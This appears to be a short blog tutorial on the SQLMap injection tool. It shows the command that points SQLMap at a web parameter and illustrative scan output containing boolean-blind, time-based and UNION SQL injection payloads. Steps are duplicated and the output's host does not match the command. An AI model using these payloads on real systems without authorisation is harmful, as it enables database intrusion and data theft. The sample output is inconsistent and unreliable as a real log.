SQLMap: Unleashing the Power of SQL Injection Testing with SQLMap
What is SQLMap?
SQLMap is a powerful tool designed to detect and exploit SQL injection vulnerabilities in web applications. Developed in Python, SQLMap is available as an open-source tool and is well-regarded for its extensive range of features and capabilities. It supports various database management systems (DBMS) and can automatically identify vulnerabilities within a target web application, enabling security professionals to rectify them proactively.
If you are using Kali Linux, SQLMap comes pre-installed. To locate SQLMap, simply open a terminal and you can access the tool directly from the command line by typing "sqlmap".
For this example, let's assume that you have identified a web application with the IP address 192.168.10.10 and suspect that it might be vulnerable to SQL injection. To test this hypothesis using SQLMap, follow these steps:
Step 1: Launch SQLMap:
Open a terminal in Kali Linux and type the following command to start SQLMap
sqlmapStep 2: Specify the Target:
Next, you need to specify the target URL (or IP address) for the web application you want to test. In this case, we'll use a database hosted at the IP address 192.168.10.10
sqlmap -u http://192.168.10.10/product.php?id=1Step 3: Start the Scan:
Once you've specified the target, SQLMap will automatically begin scanning the application for potential SQL injection vulnerabilities. The tool will perform a series of tests and checks to identify any exploitable points.
Step 4: Review the Results:
After completing the scan, SQLMap will display the results of its assessment. Pay close attention to any vulnerabilities identified, as well as the risk level associated with each finding.
Step 5: Exploit the Vulnerabilities:
If SQLMap detects any SQL injection vulnerabilities, you have the option to exploit them directly from the tool.
Step 4: Review the Results:
After completing the scan, SQLMap will display the results of its assessment. Pay close attention to any vulnerabilities identified, as well as the risk level associated with each finding.
[INFO] testing connection to the target URL
[INFO] analyzing target URL
[INFO] testing if the target URL is vulnerable to SQL injection
[INFO] the target URL is vulnerable to SQL injection (parameter: id)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.com/product.php?id=1' AND 5678=5678-- -
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://example.com/product.php?id=1' AND (SELECT 7737 FROM (SELECT(SLEEP(5)))dQqy)-- -
Type: UNION query
Title: Generic UNION query (NULL) - 1 to 20 columns
Payload: http://example.com/product.php?id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- -
[INFO] fetched data from the target URL
Database management system:
MySQL
Version: 5.7.32
[INFO] total database(s) retrieved: 1
[INFO] retrieved data from database "example_db":
Table: products
[1 entry]
+-----+---------------+-------------+
| id | product | price |
+-----+---------------+-------------+
| 1 | Product A | $25.99 |
+-----+---------------+-------------+
Step 5: Exploit the Vulnerabilities:
If SQLMap detects any SQL injection vulnerabilities, you have the option to exploit them directly from the tool.
Leave a Comment